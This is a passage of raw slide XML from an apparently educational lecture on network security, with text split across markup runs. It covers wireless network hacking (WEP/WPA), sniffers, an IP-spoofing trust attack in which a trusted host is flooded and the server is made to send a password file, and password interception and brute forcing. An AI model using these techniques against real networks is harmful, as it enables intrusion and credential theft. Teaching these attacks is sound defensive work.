              <a:rPr lang="en-US" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> - search for vulnerable wireless networks, hacking (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>WEP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>, WPA1)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> password selection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>(WPA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>)</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Satellite fishing</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Software:</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="30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2600" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2600" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> - available for all operating systems, has a graphical interface, uses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Pcap</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="26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2600" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>tcpdump – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2600" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>in *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>nix-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2600" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>systems</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="26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Library </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Pcap (Packet Capture)</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2600" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="341280" indent="-339480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="224"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="2600" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="341280" indent="-339480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="224"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="2600" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="341280" indent="-339480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="224"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="26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8F85B7B5-D3B3-4B8E-8201-C03E3C48370A}"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900" b="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>IP-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3900" b="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>spoofing</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3900" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="CustomShape 2" hidden="0"/>
          <p:cNvSpPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1500120"/>
            <a:ext cx="8229240" cy="514332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3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>IP-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>spoofing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>– substitution of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" b="0" i="0" u="none" strike="noStrike" cap="none" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>sender's</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>IP-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> </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Often used in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>DDoS-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>attacks </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Example of use in systems with authorization by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>IP-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> (TCP)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="689040" lvl="1" indent="-347400">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="49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000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Assume that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> A “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>trusts you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>” B </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>(does not require a password)</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="689040" lvl="1" indent="-347400">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="49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2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Z </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>blocks it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> B </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>sending a bunch of requests (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>DoS-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>attack)</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="689040" lvl="1" indent="-347400">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="49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2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Z </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>sends a connection request (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>SYN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>) to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>on behalf of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="689040" lvl="1" indent="-347400">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="49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2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>agrees by sending</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> ACK </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> B</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="689040" lvl="1" indent="-347400">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="49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2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>B </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>can't report an error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>it's under attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="689040" lvl="1" indent="-347400">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="49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2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Z </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>sends commands</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> (send a file with passwords to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>IP-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>address ... on the port ...)</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="341280" indent="-339480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="499"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="2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B6CA570C-B6AC-44F4-99BA-D61E4632F06A}"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Authentication</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3900" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="CustomShape 2" hidden="0"/>
          <p:cNvSpPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="142920" y="1500120"/>
            <a:ext cx="9000720" cy="5357520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="45000" rIns="90000" bIns="45000">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="372354" indent="-371994">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="649"/>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Key / password interception</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2600" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="689040" lvl="1" indent="-347400">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="550"/>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200" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Many standard Internet protocols do not encrypt the password during transmission, for example, standard authentication on a web server; authentication on a proxy server; forums; FTP; SMTP; POP3; IMAP...</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2200" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="372354" indent="-371994">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="649"/>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Password Selection </a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2600" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="689040" lvl="1" indent="-347400">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="550"/>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200" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Password matching programs for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>FTP-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2200" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>servers, mail servers, social networks, etc. </a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2200" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="689040" lvl="1" indent="-347400">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="550"/>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200" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Weak passwords - brute force 365 birthdays</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2200" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="689040" lvl="1" indent="-347400">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="550"/>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200" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Online WPA Cracker</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2200" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="372354" indent="-371994">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="649"/>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Insufficient authentication</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2600" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="689040" lvl="1" indent="-347400">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="550"/>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200" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>IP-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2200" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>address</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2200" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="689040" lvl="1" indent="-347400">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="550"/>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200" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
